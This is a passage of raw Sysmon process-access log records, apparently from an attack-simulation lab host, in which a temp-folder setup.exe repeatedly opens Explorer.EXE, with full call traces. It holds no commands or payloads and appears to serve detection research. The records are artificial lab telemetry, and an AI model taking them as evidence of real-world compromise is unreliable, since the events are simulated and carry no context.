ppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015788Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.755{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015787Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.755{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015786Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.755{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000015785Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.755{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64) 10341000x800000000000000015784Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.755{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000015783Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.755{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000015782Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.755{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 10341000x800000000000000015781Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.755{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64) 10341000x800000000000000015780Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.755{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000015779Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.755{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000015778Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.755{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64) 10341000x800000000000000015777Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.755{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 10341000x800000000000000015776Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.755{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015775Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.755{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015774Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.755{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000015773Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.755{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000015772Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.739{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015771Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.739{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C